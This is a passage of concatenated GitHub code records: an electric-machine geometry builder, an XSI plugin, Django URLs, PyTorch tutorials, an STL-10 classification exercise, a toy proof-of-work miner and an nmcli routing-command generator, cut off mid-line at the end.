-*-\nfrom numpy import pi\n\nfrom ....Methods.Machine.LamSlot.build_geometry import build_geometry as build_geo\n\n\ndef build_geometry(self, is_magnet=True, sym=1, alpha=0, delta=0, is_simplified=False):\n \"\"\"Build the geometry of the LamSlotMag\n\n Parameters\n ----------\n self : LamSlotMag\n LamSlotMag object\n is_magnet : bool\n If True build the magnet surfaces\n sym : int\n Symmetry factor (1= full machine, 2= half of the machine...)\n alpha : float\n Angle for rotation [rad]\n delta : complex\n Complex value for translation\n is_simplified: bool\n True to avoid line superposition\n\n Returns\n -------\n surf_list : list\n list of surfaces needed to draw the lamination\n\n \"\"\"\n\n if self.is_stator:\n st = \"Stator\"\n else:\n st = \"Rotor\"\n\n assert (self.slot.Zs % sym) == 0, (\n \"ERROR, Wrong symmetry for \"\n + st\n + \" \"\n + str(self.slot.Zs)\n + \" slots and sym=\"\n + str(sym)\n )\n # getting the LamSlot surface\n surf_list = build_geo(self, sym=sym)\n\n Zs = self.slot.Zs\n slot_pitch = 2 * pi / Zs\n\n # Add the magnet surface(s)\n if is_magnet and self.magnet is not None:\n # for each magnet to draw\n for ii in range(Zs // sym):\n mag_surf = self.slot.get_surface_active(\n alpha=slot_pitch * ii + slot_pitch * 0.5\n )\n # Defining type of magnetization of the magnet\n if self.magnet.type_magnetization == 0:\n type_mag = \"Radial\"\n elif self.magnet.type_magnetization == 1:\n type_mag = \"Parallel\"\n elif self.magnet.type_magnetization == 2:\n type_mag = \"Hallbach\"\n else:\n type_mag = \"\"\n\n surf_list.append(mag_surf)\n # Adapt the label\n if ii % 2 != 0: # South pole\n surf_list[-1].label = (\n \"Magnet\" + st + type_mag + \"_S_R0\" + \"_T0_S\" + str(ii)\n )\n else: # North pole\n surf_list[-1].label = (\n \"Magnet\" + st + type_mag + \"_N_R0\" + \"_T0_S\" + str(ii)\n )\n\n # Apply the transformations\n for surf in surf_list:\n surf.rotate(alpha)\n surf.translate(delta)\n\n return surf_list\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Machine/LamSlotMag/build_geometry.py","file_name":"build_geometry.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12141117264","text":"\"\"\"\nSimple XSI Plugin for hiding a collection of objects. You can also hide the\nicon display for the nulls by providing a second boolean value.\n\n>>> Application.zHide(col_objects, True)\n\"\"\"\n\n__version__ = '$Revision: 185 $'\n__author__ = '$Author: andy $'\n__date__ = '$Date: 2009-02-06 21:04 -0800 $'\n\nimport win32com.client\nfrom win32com.client import constants\nfrom win32com.client import constants as c\nfrom win32com.client.dynamic import Dispatch as dispatch\n\nxsi = Application\nlog = xsi.logmessage\n\nnull = None\nfalse = 0\ntrue = 1\n\ndef XSILoadPlugin(in_reg):\n\tin_reg.Author = \"Andy Buecker\"\n\tin_reg.Name = \"zHide\"\n\tin_reg.Email = \"andy@zoogloo.net\"\n\tin_reg.URL = \"\"\n\tin_reg.Major = 1\n\ttry:\n\t\tin_reg.Minor = int(__version__.split(' ')[1])\n\texcept:\n\t\tin_reg.Minor = 0\n\n\tin_reg.RegisterCommand('zHide', 'zHide')\n\t\n\t# copyright message #\n\tmsg = '''\n------------------------------------------\n %s (v.%d.%d)\n Copyright 2008 Zoogloo LLC.\n All rights Reserved.\n------------------------------------------\n\t''' % (in_reg.Name, in_reg.Major, in_reg.Minor)\n\tlog(msg)\n\n\treturn true\n\ndef XSIUnloadPlugin(in_reg):\n\tstrPluginName = in_reg.Name\n\tApplication.LogMessage(str(strPluginName) + str(\" has been unloaded.\"))\n\treturn true\n\n#-----------------------------------------------------------------------------\n# Commands\n#-----------------------------------------------------------------------------\ndef zHide_Init(ctxt):\n\toCmd = ctxt.Source\n\toCmd.Description = \"\"\n\toCmd.SetFlag(c.siNoLogging, True)\n\n\toArgs = oCmd.Arguments\n\toArgs.AddWithHandler('col_object', c.siArgHandlerCollection)\n\toArgs.Add('null_icons', c.siArgumentInput, c.siBool, True)\n\n\treturn True\n\t\ndef zHide_Execute(col_object, null_icons):\n\n\t# step through the collection #\n\tfor item in col_object:\n\t\t\n\t\t# turn off the ogl display #\n\t\titem.Properties('Visibility').Parameters('viewvis').Value = 0\n\t\t\n\t\t# turn ogg the render display #\n\t\titem.Properties('Visibility').Parameters('rendvis').Value = 0\n\t\t\n\t\t# turn off the primary icon #\n\t\tif null_icons and item.Type == 'null':\n\t\t\titem.primary_icon.Value \t= 0\n\t\t\titem.shadow_icon.Value \t= 0\n","repo_name":"nazimba/Zoogloo-Tools","sub_path":"zRigTools/Application/Plugins/zHide.py","file_name":"zHide.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28180137419","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('addform/getq', views.displayques ,name='displayques'),\n path('login/', views.login ,name='login'),\n path('login/checklogin', views.checklogin ,name='checklogin'),\n path('addsub/', views.addsubname ,name='addsubname'),\n path('add/', views.addtodb ,name='add'),\n path('allsubjects/',views.allsubjects,name='allsubjectss'),\n path('editor/',views.editor,name='editor'),\n path('subeditor/',views.subeditor,name='subeditor'),\n path('editquestion/',views.editquestion,name='editquestion'),\n path('editsubject/',views.editsubject,name='editsubject'),\n]","repo_name":"sudheersuri/Xamarin-QuickPrep-Application","sub_path":"questionsapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13600522919","text":"\"\"\"\r\nNormalization\r\n正则化层. 可以优化网络.\r\n\r\nRecurrent Layers\r\n一些写好的网络结构,\r\n\r\nTransformer Layers\r\n也是一种写好的网络结构\r\n\r\nLinear Layers\r\n线性层\r\n\r\nDropout Layers\r\n nn.Dropout()\r\n 就是在训练的过程中, 随机丢弃一些其中的因素,\r\n 按照p(概率)去丢失. 为了防止过拟合现象\r\nDistance Layers\r\n 就是计算误差\r\nLoss Function:\r\n 就是损失函数.\r\n\r\n\r\n这里主要看线性层:\r\n 其实也就是全连接层 FULL_\r\ntorch.nn.Linear(in_features, out_features, bias=True, device=None, dtype=None)\r\n torch封装的非常好, 只要输入, 和输出以及是否要偏置就可以实现\r\n实际上就是矩阵相乘, 使得最后的结果得到我们想要的形状\r\n因为是矩阵相乘, 所以输入的tensor必须是一个二维的\r\n所以一般再使用Linear之前, 我们一般会使用reshape和view\r\n所以一般是: [barch, ...]然后与矩阵相乘, 根据我们的要求, 得到最终的结果\r\ninput:(*, input)\r\noutput: (*, output)\r\n\r\n\r\nin_features – size of each input sample\r\nout_features – size of each output sample\r\nbias – If set to False, the layer will not learn an additive bias. Default: True\r\n\r\n\r\ntorchvision.models\r\n这里面提供了一些非常经典对于图像方面的网络结构.\r\n别人已经训练好的模型, 你拿过来直接使用就好了.\r\n\r\n \"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data import DataLoader\r\nimport torchvision\r\nimport torchvision.transforms as F\r\n\r\nBATCH_SIZE = 64\r\n\r\nclass MyLinear(nn.Module):\r\n def __init__(self):\r\n super(MyLinear, self).__init__()\r\n self.linear = nn.Linear(\r\n in_features=3*32*32,\r\n out_features=10\r\n )\r\n def forward(self, x):\r\n return self.linear(x)\r\n\r\n\r\ndef test01():\r\n # 加载数据集\r\n dataset = torchvision.datasets.CIFAR10(\r\n root=\"./CIFAR10_data\",\r\n train=False,\r\n transform=F.ToTensor(),\r\n\r\n )\r\n # 加载数据加载器\r\n dataloader = DataLoader(\r\n dataset=dataset,\r\n batch_size=BATCH_SIZE,\r\n shuffle=True,\r\n num_workers=4,\r\n drop_last=True,\r\n\r\n )\r\n\r\n for idx, (img, label) in enumerate(dataloader):\r\n print(img.shape)\r\n # 再介绍一个函数:\r\n # img = torch.flatten(img) # 直接摊平.\r\n # print(img.shape)\r\n # torch.flatten()直接摊平,\r\n img = torch.reshape(img, (-1, 3*32*32))\r\n img_out = MyLinear()(img)\r\n print(img_out.shape)\r\n # torch.Size([64, 10])\r\n # 当摊平后:\r\n # torch.Size([10])\r\n break\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n test01()","repo_name":"WakingHours-GitHub/PyTorch","sub_path":"4_土堆torch学习/11_线性层.py","file_name":"11_线性层.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29802785659","text":"from random import choice\nfrom random import randint\nfrom string import ascii_letters\nfrom string import digits\n\nimport hashlib\n\n\ndef mint(challenge, work_factor):\n nonce = 0\n while True:\n nonce_str = str(nonce)\n if verify(challenge, work_factor, nonce_str): # ensure nonce is correct\n return nonce_str\n nonce += 1\n\ndef verify(challenge, work_factor, nonce):\n \"\"\"Checks if nonce starts with sufficient 0's\"\"\"\n\n full_header = challenge + nonce\n h = hashlib.sha256()\n h.update(full_header.encode(\"utf-8\"))\n hash_output = h.hexdigest()\n for i in range(0, work_factor): \n if not hash_output[i] == str(0):\n return False\n return True\n\ndef generate_challenge_string(length=16):\n chars = ascii_letters + digits\n return ''.join([choice(chars) for n in range(length)])\n\n\n\nif __name__ == '__main__':\n\n work_factor = 4\n challenge = generate_challenge_string()\n\n print(\"Challenge: %s\" % challenge)\n print(\"Mining...\")\n\n nonce = mint(challenge, work_factor)\n \n print(\"Nonce: %s\" % nonce)\n","repo_name":"stewartfortier/DumbCoin","sub_path":"proof/proof.py","file_name":"proof.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22687560809","text":"# Authors: Mackenzie Hodd, Justin Stewart\r\n# all credit goes to Justin Stewart\r\nimport sys\r\nfile_Location = 'C:\\\\Users\\\\Mackenzie\\\\Documents\\\\test.txt' #Enter your file path here. You'll have to edit the slash direction if you running on linux\r\nnmclicmds = ['nmcli con modify ens192 +ipv4.routes 192.168.1.0/24 172.20.1.1 100','nmcli con modify ens192 +ipv4.routes 192.168.2.0/24 172.20.2.1 100','nmcli con modify ens192 +ipv4.routes 192.168.3.0/24 172.20.3.1 100']\r\nrestartCmds = ['nmcli con down ens192', 'nmcli con up ens192']\r\ncount = 3\r\nnetnum = 0\r\nwhile True:\r\n newstring = 'nmcli con modify ens192 +ipv4.routes 192.168.' + str(count) + '.0/24 172.20.' + str(count) + '.1 100'\r\n nmclicmds.append(newstring)\r\n count = count + 1\r\n if count == 44:\r\n break\r\n\r\nr = open(file_Location, 'w')\r\nfor item in nmclicmds:\r\n newline = item + '\\n'\r\n r.write(newline)\r\nfor cmds in restartCmds:\r\n lines = cmds + '\\n'\r\n r.write(lines)\r\nr.close()\r\n\r\nprint(\"Done\")\r\n","repo_name":"mhodd-ops435/ops535NBB","sub_path":"labs/lab6/vm1_routing.py","file_name":"vm1_routing.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3264765506","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nfrom torchsummary import summary\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nprint('debugger checkpoint')\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# device = torch.device(\"cpu\")\n###\ncuda = True\nseed = 42\nuse_cuda = cuda and torch.cuda.is_available()\n\n# Set seed\nnp.random.seed(seed)\ntorch.manual_seed(seed)\nif use_cuda:\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n# Handel GPU stochasticity\ntorch.backends.cudnn.enabled = use_cuda\ntorch.backends.cudnn.benchmark = False\ntorch.backends.cudnn.deterministic = True\n\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n###\noriginal_size = 96\ncropped_size = 64\nnum_channels = 3\nnum_classes = 10\n\n##\n\nmean, std = (0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)\n\n# transform = transforms.Compose(\n# [transforms.ToTensor(),\n# transforms.Normalize(mean, std)])\n\ntrain_transform=transforms.Compose([\n transforms.Pad(4),\n transforms.RandomCrop(cropped_size),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n\t\t\t\t\t# transforms.RandomRotation(degrees=(0, 20))\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\ntest_transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.CenterCrop(cropped_size),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), ])\n\ntrainset = torchvision.datasets.STL10(root='./ex3/data', split='train', download=True, transform=train_transform)\nvalset = torchvision.datasets.STL10(root='./ex3/data', split='train', download=True, transform=test_transform)\ntargets = trainset.labels\ntargets_idx = np.arange(len(targets))\ntrain_idx, valid_idx = train_test_split(targets_idx, test_size=0.2, random_state=seed,shuffle=True, stratify=targets)\ntrain_sampler = torch.utils.data.SubsetRandomSampler(train_idx)\nval_sampler = torch.utils.data.SubsetRandomSampler(valid_idx)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=8,num_workers=4, sampler=train_sampler)\nvalloader = torch.utils.data.DataLoader(valset, batch_size=16,num_workers=4, sampler=val_sampler)\ntestset = torchvision.datasets.STL10(root='./ex3/data', split='test',download=True, transform=test_transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=16,shuffle=False, num_workers=1)\n\n###\n\nclasses = ('airplane', 'bird', 'car', 'cat', 'deer', 'dog', 'horse', 'monkey', 'ship', 'truck')\n\n###\n\ndef imshow(img):\n img = img / 2 + 0.5 # unnormalize\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\n\n# get some random training images\ndataiter = iter(trainloader)\nimages, labels = dataiter.next()\n\nimgs_dict = dict(zip(classes, [[],[],[],[],[],[],[],[],[],[]]))\ncounters_dict = dict(zip(classes, [0]*10))\n\nwhile not all(v >= 4 for v in counters_dict.values()):\n images, labels = dataiter.next()\n for image, label in zip(images, labels):\n img_class = classes[label]\n if(counters_dict[img_class] < 4):\n imgs_dict[img_class].append(image)\n counters_dict[img_class] += 1\n\n\n###\n\n# show images\n\n# for l,imgs in imgs_dict.items():\n# print(l)\n# imshow(torchvision.utils.make_grid(imgs, nrow=4))\n\n###\n\n# show an image and its augmented version:\n# we choose to add to our dataloader a horizontal flip, and a random rotation of 20 degrees:\nrotater = transforms.RandomRotation(degrees=(0,30))\nfliper = transforms.RandomHorizontalFlip(p=0.5)\nfliper_for_visualization = transforms.RandomHorizontalFlip(p=1)\nimages,_ = dataiter.next()\nimg = images[0]\n# plt.figure()\n# imshow(img)\nimg_aug = rotater(img)\nimg_aug = fliper_for_visualization(img_aug)\n# plt.figure()\n# imshow(img_aug)\n\n###\ndef train(net, trainloader, valloader, num_epochs=50, validation_ratio=0.2, augment=False):\n\tcriterion = nn.CrossEntropyLoss()\n\t# optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\n\toptimizer = optim.Adam(net.parameters(), lr=0.0001)\n\tepoch_pbar = tqdm(range(num_epochs))\n\n\tfor epoch in epoch_pbar: # loop over the dataset multiple times\n\t\trunning_loss = 0.0\n\t\tcorrect_train = 0\n\t\ttotal_train = 0\n\t\tnet.num_epochs += 1\n\t\tcounter = 0\n\t\tfor i, data in enumerate(trainloader, 0):\n\t\t\t# get the inputs; data is a list of [inputs, labels]\n\t\t\tcounter += 1\n\t\t\tinputs, labels = data\n\t\t\tinputs = inputs.to(device)\n\t\t\tlabels = labels.to(device)\n\t\t\t\t#train:\n\n\t\t\ttotal_train += labels.size(0)\n\n\t\t\tif augment: # augmentation\n\t\t\t\tinputs = rotater(inputs)\n\t\t\t\tinputs = fliper(inputs)\n\n\t\t\t# zero the parameter gradients\n\t\t\toptimizer.zero_grad()\n\n\t\t\t# forward + backward + optimize\n\t\t\toutputs = net(inputs)\n\t\t\tloss = criterion(outputs, labels)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\t_, predicted = torch.max(outputs.data, 1)\n\t\t\tcorrect_train += (predicted == labels).sum().item()\n\n\t\t\t# print statistics\n\t\t\trunning_loss += loss.item()\n\t\t\t# if i % 2000 == 1999: # print every 2000 mini-batches\n\t\t\t# \tprint('[%d, %5d] loss: %.3f' %\n\t\t\t# \t\t(epoch + 1, i + 1, running_loss / 2000))\n\t\t\t# \trunning_loss = 0.0\n\n\t\tepoch_loss = running_loss/float(counter)\n\t\ttrain_acc = 100*correct_train/total_train\n\t\tnet.train_loss_list.append(epoch_loss)\n\t\tnet.train_accuracy.append(train_acc)\n\n\t\t#validation\n\t\tval_los,val_acc = test(net,valloader, print_res=False)\n\t\tnet.val_loss_list.append(val_los)\n\t\tnet.val_accuracy.append(val_acc)\n\t\tepoch_pbar.set_postfix({'epoch': epoch, 'train loss': epoch_loss, 'train_accuracy': train_acc, 'val loss': val_los, 'val_accuracy': val_acc})\n\t\t# epoch_pbar.set_postfix({'epoch': epoch, 'train accuracy': train_acc, 'train loss': train_loss, \\\n # 'val accuracy': val_acc, 'val loss': val_loss})\n\n\tprint('Finished Training')\n\n###\n\ndef test(net, testloader, print_res = True):\n correct = 0\n total = 0\n running_loss = 0\n counter = 0\n criterion = nn.CrossEntropyLoss()\n with torch.no_grad():\n for data in testloader:\n counter += 1\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n outputs = net(images)\n loss = criterion(outputs, labels)\n running_loss += float(loss)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n \n los = running_loss / float(counter)\t\t\n acc = 100 * correct / total\n if print_res:\n\t print(f'Accuracy of the network on the {total} test images: %d %%' % (acc))\n\t\n return los, acc\n\n\n###\n# New Cell Added:\n\ndef show_learning_curve(train_loss_list, val_loss_list, train_accuracy, val_accuracy,\n\t\t\t\t\t\tnum_epochs, title, figsize = (8, 8)):\n\n\tfig, axes = plt.subplots(1, 2, figsize=figsize);\n\taxes[0].set_xlabel('epochs')\n\taxes[0].set_ylabel('loss')\n\taxes[0].plot(range(num_epochs), train_loss_list, label=\"Train\", color='blue')\n\taxes[0].plot(range(num_epochs), val_loss_list, label=\"Validation\", color='red')\n\taxes[0].legend()\n\taxes[0].set_title('Loss vs Epoch')\n\n\n\taxes[1].set_xlabel('epochs')\n\taxes[1].set_ylabel('accuracy') # we already handled the x-label with ax1\n\taxes[1].plot(range(num_epochs), train_accuracy, label=\"Train\", color='blue')\n\taxes[1].plot(range(num_epochs), val_accuracy, label=\"Validation\", color='red')\n\taxes[1].legend()\n\taxes[1].set_title('Accuracy vs Epoch')\n\n\tfig.suptitle(title)\n\n\n\t# fig.suptitle('Logistic Regression:\\n\\n learning rate = {} | batch size = {} | L2 lambda = {}'\n\t# .format(lr, batch_size, l2_lambda))\n\n\t# return fig;\n\n###\nclass LogisticRegression(nn.Module):\n\tdef __init__(self):\n\t\tsuper(LogisticRegression, self).__init__()\n\t\tself.flatten = nn.Flatten()\n\t\tself.linear_relu_stack = nn.Sequential(nn.Linear(\n\t\t\tcropped_size*cropped_size*num_channels, num_classes)).to(device)\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\t\tx = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n\n###\nnet = LogisticRegression()\nshow_learning_curve(*net.history(), title=\"Learning Curves - Logistic Regression\")\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader)\n###\ntest(net, testloader)\n###\nclass FullyConnectedNN(nn.Module):\n\tdef __init__(self):\n\t\tsuper(FullyConnectedNN, self).__init__()\n\t\tself.flatten = nn.Flatten()\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.Linear(cropped_size*cropped_size*num_channels, 512),\n nn.ReLU(),\n nn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n nn.Linear(512, 512),\n nn.ReLU(),\n\t\t\tnn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(512, 512),\n nn.ReLU(),\n\t\t\tnn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(512, 512),\n nn.ReLU(),\n\t\t\tnn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n nn.Linear(512, 10)\n ).to(device)\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\t\tx = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n###\nnet = FullyConnectedNN()\ntrain(net, trainloader, valloader, num_epochs=10)\nshow_learning_curve(*net.history(), title=\"Learning Curves - Fully Connected NN\")\n###\ntest(net, testloader)\n###\nclass ConvNN(nn.Module):\n\tdef __init__(self):\n\t\tsuper(ConvNN, self).__init__()\n\t\tself.feature_extraction = nn.Sequential(\n\t\t\tnn.Conv2d(num_channels, 128, 3), # 64 64 3 => 31 31\n\t\t\tnn.ReLU(),\n\t\t\tnn.BatchNorm2d(128),\n\t\t\tnn.MaxPool2d(2),\n\t\t\tnn.Conv2d(128, 64, 3),\n\t\t\tnn.ReLU(),\n\t\t\tnn.BatchNorm2d(64),\n\t\t\tnn.MaxPool2d(2),\n\t\t).to(device)\n\t\tself.flatten = nn.Flatten()\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.Linear(12544, 1024),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(1024, 512),\n nn.ReLU(),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(512, 10)\n\t\t).to(device)\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\t\tx = self.feature_extraction(x)\n\t\tx = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n###\nnet = ConvNN()\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader, num_epochs=30)\nshow_learning_curve(*net.history(), title=\"Learning Curves - Convolutional NN\")\n###\ntest(net, testloader)\n###\nclass MobileNetV2FetureExt_FrozenNN(nn.Module):\n\tdef __init__(self, pretrained=True):\n\t\tsuper(MobileNetV2FetureExt_FrozenNN, self).__init__()\n\t\tself.feature_extractor = torch.hub.load('pytorch/vision:v0.10.0', 'mobilenet_v2', pretrained=True).to(device)\n\t\t# Freeze all layers\n\t\tfor param in self.feature_extractor.parameters():\n\t\t\tparam.requires_grad = False\n\t\t# Unfreeze last layer (1000 neurons):\n\t\tparams = self.feature_extractor.state_dict()\n\t\tparams.get('classifier.1.weight').requires_grad = True\n\t\tparams.get('classifier.1.bias').requires_grad = True\n\t\t# Add the top layer to the model.\n\t\t# It consists of Relu, dropout, and an additional Fully Connected (1000 neurons as well) with\n\t\t# Relu and dropout as well. After that comes the classification layer (10 neurons)\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.ReLU(),\n\t\t\tnn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 1000),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 10)).to(device)\n\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\n\t\tx = self.feature_extractor(x)\n\t\t# x = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n\n\n###\nnet = MobileNetV2FetureExt_FrozenNN()\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader,100)\nshow_learning_curve(*net.history(), title=\"Learning Curves - MobileNetV2 (Frozen Conv Blocks)\")\n###\ntest(net, testloader)\n###\n\nclass MobileNetV2FetureExtNN(nn.Module):\n\tdef __init__(self, pretrained=True):\n\t\tsuper(MobileNetV2FetureExtNN, self).__init__()\n\t\tself.feature_extractor = torch.hub.load('pytorch/vision:v0.10.0', 'mobilenet_v2', pretrained=True).to(device)\n\n\t\t# This time we only add the top layer to the model.\n\t\t# It consists of Relu, dropout, and an additional Fully Connected (1000 neurons as well) with\n\t\t# Relu and dropout as well. After that comes the classification layer (10 neurons)\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.ReLU(),\n\t\t\t# nn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 1000),\n\t\t\tnn.ReLU(),\n\t\t\t# nn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 10)).to(device)\n\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\n\t\tx = self.feature_extractor(x)\n\t\t# x = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n\n\n###\nnet = MobileNetV2FetureExtNN(pretrained=False).to(device)\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader, 100)\nshow_learning_curve(*net.history(), title=\"Learning Curves - MobileNetV2 (Whole Model Trainable)\")\n###\ntest(net, testloader)\n###\n","repo_name":"moshebeutel/DL_BIU","sub_path":"ex3/DeepLearningEx3.py","file_name":"DeepLearningEx3.py","file_ext":"py","file_size_in_byte":14087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74430261287","text":"# When taking sqrt for initialization you might want to use math package,\n# since torch.sqrt requires a tensor, and math.sqrt is ok with integer\nimport math\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.distributions import Uniform\nfrom torch.nn import Module\nfrom torch.nn.functional import cross_entropy, relu\nfrom torch.nn.parameter import Parameter\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom utils import load_dataset, problem\n\n\nclass F1(Module):\n @problem.tag(\"hw3-A\", start_line=1)\n def __init__(self, h: int, d: int, k: int):\n \"\"\"Create a F1 model as described in pdf.\n\n Args:\n h (int): Hidden dimension.\n d (int): Input dimension/number of features.\n k (int): Output dimension/number of classes.\n \"\"\"\n super().__init__()\n # raise NotImplementedError(\"Your Code Goes Here\")\n self.h = h\n self.d = d\n self.k = k\n self.alpha_0 = 1 / np.sqrt(d)\n self.alpha_1 = 1 / np.sqrt(h)\n self.W0 = torch.FloatTensor(h, d).uniform_(-self.alpha_0, self.alpha_0)\n self.b0 = torch.FloatTensor(1, h).uniform_(-self.alpha_0, self.alpha_0)\n self.W1 = torch.FloatTensor(k, h).uniform_(-self.alpha_1, self.alpha_1)\n self.b1 = torch.FloatTensor(1, k).uniform_(-self.alpha_1, self.alpha_1)\n\n self.params = [self.W0, self.b0, self.W1, self.b1]\n for param in self.params:\n param.requires_grad = True\n\n @problem.tag(\"hw3-A\")\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Pass input through F1 model.\n\n It should perform operation:\n W_1(sigma(W_0*x + b_0)) + b_1\n\n Args:\n x (torch.Tensor): FloatTensor of shape (n, d). Input data.\n\n Returns:\n torch.Tensor: LongTensor of shape (n, k). Prediction.\n \"\"\"\n # raise NotImplementedError(\"Your Code Goes Here\")\n x = torch.matmul(x, self.W0.T) + self.b0\n x = relu(x)\n x = torch.matmul(x, self.W1.T) + self.b1\n return x\n\n\nclass F2(Module):\n @problem.tag(\"hw3-A\", start_line=1)\n def __init__(self, h0: int, h1: int, d: int, k: int):\n \"\"\"Create a F2 model as described in pdf.\n\n Args:\n h0 (int): First hidden dimension (between first and second layer).\n h1 (int): Second hidden dimension (between second and third layer).\n d (int): Input dimension/number of features.\n k (int): Output dimension/number of classes.\n \"\"\"\n super().__init__()\n # raise NotImplementedError(\"Your Code Goes Here\")\n self.h0 = h0\n self.h1 = h1\n self.d = d\n self.k = k\n self.alpha_0 = 1 / np.sqrt(d)\n self.alpha_1 = 1 / np.sqrt(h0)\n self.alpha_2 = 1 / np.sqrt(h1)\n self.W0 = torch.FloatTensor(h0, d).uniform_(-self.alpha_0, self.alpha_0)\n self.b0 = torch.FloatTensor(1, h0).uniform_(-self.alpha_0, self.alpha_0)\n self.W1 = torch.FloatTensor(h1, h0).uniform_(-self.alpha_1, self.alpha_1)\n self.b1 = torch.FloatTensor(1, h1).uniform_(-self.alpha_1, self.alpha_1)\n self.W2 